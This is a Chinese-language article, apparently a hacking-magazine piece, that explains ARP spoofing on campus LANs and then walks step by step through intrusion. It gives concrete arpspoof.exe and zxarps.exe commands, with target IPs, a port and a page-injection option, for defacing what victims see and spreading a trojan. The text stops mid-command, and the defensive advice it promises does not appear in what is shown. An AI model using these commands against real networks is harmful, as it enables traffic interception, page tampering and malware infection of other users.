近期一種新型的“地址解析協議欺騙”(簡稱:ARP欺騙)攻擊手段正在校園網中擴散,嚴重影響了包括校園網的各種類型局域網的正常運行。駭客通過偽造一個假的網關進行木馬的散播,讓局域網內的用戶一上網就會連接有木馬的地址,而用戶唯一的感覺只是網路不暢通。那麼ARP 欺騙是怎樣的一種駭客攻擊手段?普通的用戶又該如何防範ARP 欺騙攻擊呢?
“ARP 欺騙”的方式和原理
從影響網路連接通暢的方式來看,ARP 欺騙大概可以分為兩種。一種是對路由器ARP表的欺騙,這種方法可以破壞系統的ARP緩存表,從而造成內外IP地址的混亂。另一種是對局域網裏面電腦的網關欺騙,讓內網電腦系統的數據包通過假網關來發送。
第一種ARP 欺騙的原理是截獲網關數據。它通知路由器一系列錯誤的內網MAC地址,並按照一定的頻率不斷進行地址的更換,使真實的地址資訊無法通過更新保存在路由器中,結果路由器的所有數據只能發送給錯誤的MAC地址,從而造成電腦訪問駭客精心構建的網路陷阱。
第二種ARP 欺騙的原理是偽造網關。它的原理是建立假網關,讓被它欺騙的電腦向假網關發數據,而不是通過正常的路由器途徑上網。在用戶的角度看來,就是上不了網了以及網路掉線了,這樣會給用戶造成系統網關出錯的假像。
如何利用“ARP 欺騙”入侵
駭客要進行ARP 欺騙入侵只需要一個前提條件,就是進行入侵的電腦和被攻擊的電腦要在一個局域網的網段中。由於ARP 欺騙是通過數據包進行欺騙的,所以在進行操作以前要在本地電腦安裝一個驅動程式WinPcap(圖1)。
打開系統的命令提示符命令,並切換到利用工具所在的目錄,接著執行利用工具命令:arpspoof.exe /n,然後會生成一個文本檔。現在打開這個文本檔後按照自己的需求進行編輯,比如可以將“Hack by cooldiyer”改為“該系統已經被我成功入侵!”(圖2)。
在命令提示符窗口輸入命令:ArpSpoof 192.168.1.6 192.168.1.3 80 2 1 /r job.txt,其中192.168.1.6表示入侵電腦的IP地址,192.168.1.3表示被入侵電腦的IP地址,80表示用於欺騙的遠程端口。
後面的相關參數設置,用戶應該根據自己網路網關的實際類型(例如有些網關地址為192.168.0.1,有些則是192.168. 110.1)情況進行設置。當準確鍵入以上命令後回車,程式就可以進行ARP 欺騙攻擊(圖3)。當其他用戶訪問這臺伺服器的80端口後,從流覽器看到的就是我們文本檔中的內容。
剛才只是利用ARP 欺騙進行了網站攻擊,現在利用另一款欺騙工具進行木馬傳播。在命令提示符窗口查看ARP 欺騙工具zxarps.exe的使用方法,然後鍵入命令:zxarps.exe -idx 0 -ip 192.168.1.7-192.168. 1.255 -port 80 -insert “ |